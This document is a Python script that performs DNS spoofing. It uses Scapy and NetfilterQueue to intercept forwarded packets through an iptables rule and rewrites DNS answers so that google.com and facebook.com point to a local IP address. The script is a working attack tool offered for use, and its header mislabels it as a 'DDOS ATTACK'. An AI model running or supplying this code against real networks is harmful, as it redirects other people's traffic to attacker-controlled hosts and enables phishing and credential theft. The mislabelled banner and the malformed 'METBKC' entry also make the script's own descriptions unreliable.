import os  # To interact with the operating system (e.g., clear screen)
import logging as log  # For logging messages to the console
from scapy.all import IP, DNSRR, DNS, UDP, DNSQR  # Importing specific layers from Scapy for packet manipulation
from netfilterqueue import NetfilterQueue  # NetfilterQueue library to capture packets from the system's firewall

# Clear the terminal screen for a clean output
os.system("clear")

# Print a header to display the DDOS Attack information
print("\n-----------------------------------------------------")
print("\n--------- DDOS A T T A C K ---------")
print("\n--------------------------------------------------\n")

# Define the DnsSnoof class for DNS spoofing
class DnsSnoof:
    def __init__(self, hostDict, queueNum):
        """
        Constructor to initialize the class with a dictionary of domains and corresponding spoofed IPs,
        and the queue number for NetfilterQueue.
        """
        self.hostDict = hostDict  # Dictionary of domains to spoof with their corresponding fake IPs
        self.queueNum = queueNum  # Queue number to process packets from NetfilterQueue
        self.queue = NetfilterQueue()  # Initialize a NetfilterQueue instance to handle packets

    def __call__(self):
        """
        This method is invoked when the object is called. It sets up iptables to forward packets to the specified queue
        and then binds the queue to the callback method.
        """
        log.info("Snoofing....")  # Log the start of the spoofing process

        # Use iptables to redirect packets to the queue specified by 'queueNum'
        os.system(f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
        
        # Bind the NetfilterQueue to the callback method (this will process each packet intercepted)
        self.queue.bind(self.queueNum, self.callBack)

        try:
            # Run the queue to start processing packets
            self.queue.run()
        except KeyboardInterrupt:
            # If interrupted by the user (CTRL+C), flush the iptables rule to stop packet forwarding
            os.system(f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
            log.info("[!] iptable rule flushed")  # Log the flushing of the iptables rule

    def callBack(self, packet):
        """
        Callback method to handle incoming packets. It intercepts DNS response packets,
        modifies them if needed, and then forwards the modified packet.
        """
        # Convert the packet payload to a Scapy IP packet
        scapyPacket = IP(packet.get_payload())

        # Check if the packet contains a DNS response (DNSRR)
        if scapyPacket.haslayer(DNSRR):
            try:
                # Log the original DNS response for debugging purposes
                log.info(f'[original] {scapyPacket[DNSRR].summary()}')
                
                # Extract the queried domain name from the DNS request
                queryName = scapyPacket[DNSQR].qname

                # Check if the queried domain is in our spoofed dictionary
                if queryName in self.hostDict:
                    # Modify the DNS response to return the spoofed IP
                    scapyPacket[DNS].an = DNSRR(
                        rrname=queryName, rdata=self.hostDict[queryName]  # Replace with the spoofed IP
                    )
                    scapyPacket[DNS].ancount = 1  # Set the number of answers to 1 (since we are returning 1 result)

                    # Remove the IP and UDP checksums and lengths because we modified the packet content
                    del scapyPacket[IP].len  # Remove IP length field
                    del scapyPacket[IP].chksum  # Remove IP checksum field
                    del scapyPacket[UDP].len  # Remove UDP length field
                    del scapyPacket[UDP].chksum  # Remove UDP checksum field
                    
                    # Log the modified DNS response for debugging purposes
                    log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
                else:
                    # Log if the packet was not modified because the domain was not in the spoofed list
                    log.info(f'[not modified] {scapyPacket[DNSRR].rdata}')
            except IndexError as error:
                # Log any errors (e.g., if the packet format is unexpected)
                log.error(error)

        # Set the payload to the modified packet and accept it (forward the packet)
        packet.set_payload(bytes(scapyPacket))
        return packet.accept()

# Main entry point
if __name__ == '__main__':
    try:
        # Dictionary of domains to spoof and their corresponding spoofed IP addresses
        hostDict = {
            b"google.com.": "192.168.1.100",  # Spoof google.com to the IP address 192.168.1.100
            b"facebook.com.": "192.168.1.100",  # Spoof facebook.com to the IP address 192.168.1.100
            b"METBKC": "192.79.62.93"  # Spoof METBKC domain to the IP address 192.79.62.93
        }

        queueNum = 0  # The queue number for NetfilterQueue (usually a low number, 0 is used here)
        
        # Configure logging settings (timestamp and log messages)
        log.basicConfig(format='%(asctime)s - %(message)s', level=log.INFO)

        # Create an instance of the DnsSnoof class with the hostDict and queue number
        snoof = DnsSnoof(hostDict, queueNum)

        # Start the DNS spoofing process
        snoof()
    except OSError as error:
        # Catch any OS-level errors (e.g., permission issues) and log them
        log.error(error)
